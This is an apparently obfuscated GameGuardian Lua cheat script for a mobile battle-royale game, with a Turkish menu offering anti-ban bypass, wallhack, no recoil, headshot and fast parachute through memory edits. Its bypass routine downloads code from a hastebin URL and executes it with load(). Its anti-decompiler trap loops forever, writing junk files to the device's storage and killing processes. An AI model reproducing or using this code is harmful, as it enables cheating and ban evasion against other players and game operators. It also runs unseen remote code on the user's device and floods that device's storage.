while (nil)do;local o={o.uo,p.p,fq.qo.o,p.p,q.qo.uo,p.p,q.qo.o,p.p,q.q} local p={o.o,p.p,q.qoyo.uo,p.p,q.qo.o,p.p,q.q.o,p.sp,q.q} local q={o.o,p.p,q.qo.uo,p.pp,q.qo.o,p.p,q.qo.o,p.p,q.qi}local o={o.uo,p.p,q.qo.o,p.rp,q.qo.uo,p.p,q.qo.o,p.p,q.q} local p={o.o,p.p,qw.qoo.uo,p.p,q.qo.o,p.p,q.q.o,p.sp,q.q} local q={o.o,p.p,q.qo.uo,p.p,q.qbo.o,p.p,q.qo.o,p.p,q.qi}if (o.o)then if (o.o.o)then if (o.o.o.o) then if (o.o.o.o.o) then if (p.p) then if (p.p.p) then if (p.p.p.p) then if (q.q) then if (q.q.q) then if (q.q.q.q) then;o.o=(o.o(o)) o.o=(o.o(o.o.o(o.o(o)))) p.p=(p.p(p)) p.p=(p.p(p.p.p(p.p.p.p(p.p.p(p.p(p.p)))))) q.q = (q.q(q.q.q(q.q.q.q(q.q.q(q.q(q.q))))))o.o=(o.o(o)) o.o=(o.o(o.o.o(o.o(o)))) p.p=(p.p(p)) p.p=(p.p(p.p.p(p.p.p.p(p.p.p(p.p(p.p)))))) q.q = (q.q(q.q.q(q.q.q.q(q.q.q(q.q(q.q)))))) local r={o.o,p.p,q.qo.o,p.p,q.q} r.r=r[1]..r[2]..r[3] r.i= r.r(r.r(r.r(r.r(r.r(r.r(r.r)))))) end;end;end;end;end;end;end;end;end;end;end
function Squid(A0_24)
    return (A0_24:gsub("..", function(A0_25)
      return string.char((tonumber(A0_25, 16) + 256 - 34 + 255999744) % 256)
    end))
  end
  if _G["debug"]["getinfo"](gg.alert).source == "=[Java]" then
  else
    i = 1
    gg.alert("Auto Decompiler Detected", "")
    gg.setVisible(false)
    while true do
      i = i + 1
      gg.toast("Warning, Anti Log Is Activated !!")
      file = io.open("/storage/emulated/0/" .. i, "w")
      file:write("noob leecher !")
      file:close()
      gg.setVisible(false)
      gg.processKill()
      gg.setVisible(true)
    end
    return
  end
  save = {}
  for _FORV_27_ = 1, 10000 do
    table.insert(save, {
      ["address"] = 0 + _FORV_27_,
      ["flags"] = 12
    })
  end
  time = _G["os"]["clock"]()
  for _FORV_27_ = 1, 5 do
    _G["gg"]["addListItems"](save)
  end
  if 2 <= _G["os"]["clock"]() - time then
    _G["gg"]["removeListItems"](save)
    i = 1
    gg.alert("Auto Decompiler Detected", "")
    gg.setVisible(false)
    while true do
      i = i + 1
      gg.toast("Warning, Anti Log Is Activated !!")
      file = io.open("/storage/emulated/0/" .. i, "w")
      file:write("noob leecher !")
      file:close()
      gg.setVisible(false)
      gg.processKill()
      gg.setVisible(true)
    end
    print("〰〰〰〰〰〰〰〰⚠ ERROR DETECTED〰〰〰〰〰〰〰〰Restart Script ❕")
    return
  end
  _G["gg"]["removeListItems"](save)
function HOME()
os.remove('src/main/java/com/google/errorprone/annotations')
os.remove('third_party.java_src.error_prone.project.annotations.Google_internal')
os.remove('src/main/java/com/google/errorprone/annotations')
os.remove('src/main/java/com/google/errorprone/annotations.Google_internal')
gg.clearResults()
Criox = gg.choice({"🔥 AntiBan Lobi",
"🔥 Anten",
"🔥 Sekmeme",
"🔥 Kafadan Vurma",
"🔥 Hızlı Paraşüt"
}, nil, "💢 Script Criox YT")
if Criox == nil then
else
if Criox == 1 then
bypass()
end
if Criox == 2 then
gg.clearResults()
  gg.setRanges(32)
  gg.searchNumber("88.50576019287F;87.27782440186F;-100.91194152832F;1F::13", 16, false, 536870912, 0, -1)
  gg.searchNumber("88.50576019287F;87.27782440186F;1F", 16, false, 536870912, 0, -1)
  gg.getResults(6)
  gg.editAll("1.96875;1.96875;999;1.96875;1.96875;999", 16)
  gg.clearResults()
end
if Criox == 3 then
gg.clearResults()
gg.setRanges(8)
gg.searchNumber("-309056968;-298841599;-309061065", 4, false, 536870912, 0, -1)
gg.searchNumber("-298841599", 4, false, 536870912, 0, -1)
gg.getResults(5)
gg.editAll("0", 4)
gg.clearResults()
gg.toast('💪 Less Recoil')
end
if Criox == 4 then
gg.clearResults()
gg.setRanges(gg.REGION_ANONYMOUS)
gg.searchNumber("23;25;30.5", gg.TYPE_FLOAT, false, gg.SIGN_EQUAL, 0, -1)
gg.searchNumber("25;30.5", gg.TYPE_FLOAT, false, gg.SIGN_EQUAL, 0, -1)
gg.getResults(100)
gg.editAll("250", gg.TYPE_FLOAT)
gg.clearResults()
gg.toast('💪 HeadShot %99')
end
if Criox == 5 then
gg.setRanges(gg.REGION_C_BSS)
gg.searchNumber("2048D;4D;1F;1F;1D:30", gg.TYPE_FLOAT, false, gg.SIGN_EQUAL, 0, -1)
gg.getResultsCount()
gg.clearResults()
gg.setRanges(gg.REGION_ANONYMOUS)
gg.searchNumber("3000;5000;1024;1000::", gg.TYPE_FLOAT, false, gg.SIGN_EQUAL, 0, -1)
gg.getResults(3472849)
gg.editAll("100000", gg.TYPE_FLOAT)
gg.toast(" Fast Parachute ")
end
Criox = -1
end
end

function whclr()
CrioxWH = gg.multiChoice({"🔥 WallHack & Color"," 🔥 Fix Scope","🔙 Back"}, nil, "💚 WallHack & Color")
if CrioxWH == nil then
else
if CrioxWH[1] == true then
wh()
end
if CrioxWH[2] == true then
Scope()
end
if CrioxWH[3] == true then
HOME()
end
Criox = -1
end
end

function Scope()
gg.clearResults()
gg.setRanges(gg.REGION_VIDEO)
gg.searchNumber("1.0;130.0:5381", gg.TYPE_FLOAT, false, gg.SIGN_EQUAL, 0, -1)
gg.refineNumber("130", gg.TYPE_FLOAT, false, gg.SIGN_EQUAL, 0, -1)
revert = gg.getResults(100, nil, nil, nil, nil, nil, nil, nil, nil)
gg.editAll("2", gg.TYPE_FLOAT)
gg.clearResults()
gg.setRanges(gg.REGION_VIDEO)
gg.searchNumber("194D;3.7615819e-37;2;-1;1;-127::", gg.TYPE_FLOAT, false, gg.SIGN_EQUAL, 0, -1)
gg.searchNumber("2", gg.TYPE_FLOAT, false, gg.SIGN_EQUAL, 0, -1)
gg.getResults(15)
gg.editAll("130", gg.TYPE_FLOAT)
gg.clearResults()
gg.toast('💪 Fix Scope')
end

function bypass()
gg.clearResults()
gg.setRanges(gg.REGION_C_ALLOC)
gg.searchNumber("2.2958874e-41;16384D;16384D;16384D;16384D;16384D::24", gg.TYPE_FLOAT, false, gg.SIGN_EQUAL, 0, -1)
gg.refineNumber("2.2958874e-41", gg.TYPE_FLOAT, false, gg.SIGN_EQUAL, 0, -1)
if gg.getResultCount() == 0 then
gg.alert("Value Not Found\nRestart Game")
gg.processKill()
os.exit()
else
n = gg.getResultCount()
jz = gg.getResults(n)
for i = 1, n do
gg.addListItems({[1] = {address = jz[i].address + 0,flags = 4,freeze = true,value = 0}})
gg.addListItems({[1] = {address = jz[i].address + 4,flags = 4,freeze = true,value = 0}})
gg.addListItems({[1] = {address = jz[i].address + 48,flags = 4,freeze = true,value = 0}})
gg.addListItems({[1] = {address = jz[i].address + 100,flags = 4,freeze = true,value = 0}})
end
end
gg.clearResults()
gg.setRanges(gg.REGION_C_DATA)
gg.searchNumber("4480", gg.TYPE_DWORD, false, gg.SIGN_EQUAL, 0, -1)
gg.getResults(100)
local bs = gg.getResults(100, nil, nil, nil, nil, nil, nil, nil, nil)
for i, v in ipairs(bs) do
	if v.flags == gg.TYPE_DWORD then
		v.value = "0"
		v.freeze = true
	end
end
gg.addListItems(bs)
bs = nil
gg.clearResults()
TG = gg.makeRequest("https://hastebin.com/raw/beyalixugu").content
if not TG then
gg.alert('Something Went Wrong')
os.exit()
else﻿
pcall(load(TG))
end﻿
gg.clearResults()
os.remove('src/main/java/com/google/errorprone/annotations')
os.remove('third_party.java_src.error_prone.project.annotations.Google_internal')
os.remove('src/main/java/com/google/errorprone/annotations')
os.remove('src/main/java/com/google/errorprone/annotations.Google_internal')
gg.clearResults()
gg.alert('💪 Bypass Successfully')
end

function wh()
gg.clearResults()
gg.setRanges(gg.REGION_VIDEO)
gg.searchNumber("135,215D;4,140D;3.7615819e-37;2::", gg.TYPE_FLOAT, false, gg.SIGN_EQUAL, 0, -1)
gg.searchNumber("2", gg.TYPE_FLOAT, false, gg.SIGN_EQUAL, 0, -1)
gg.getResults(20)
gg.editAll("130", gg.TYPE_FLOAT)
gg.clearResults()
gg.setRanges(gg.REGION_VIDEO)
gg.searchNumber("194D;3.7615819e-37;2;-1;1;-127::", gg.TYPE_FLOAT, false, gg.SIGN_EQUAL, 0, -1)
gg.searchNumber("2", gg.TYPE_FLOAT, false, gg.SIGN_EQUAL, 0, -1)
gg.getResults(20)
gg.editAll("130", gg.TYPE_FLOAT)
gg.clearResults()
gg.setRanges(gg.REGION_VIDEO)
gg.searchNumber("8200", 4, false, 536870912, 0, -1)
gg.refineAddress("0B0")
gg.getResults(1000)
gg.editAll("6", 4)
gg.clearResults()
gg.toast('💪 WallHack & Color')
end

while true do
if gg.isVisible(false) then
Criox = 1
gg.setVisible(false)
end-- if | bydz
if Criox == 1 then
HOME()
end
end
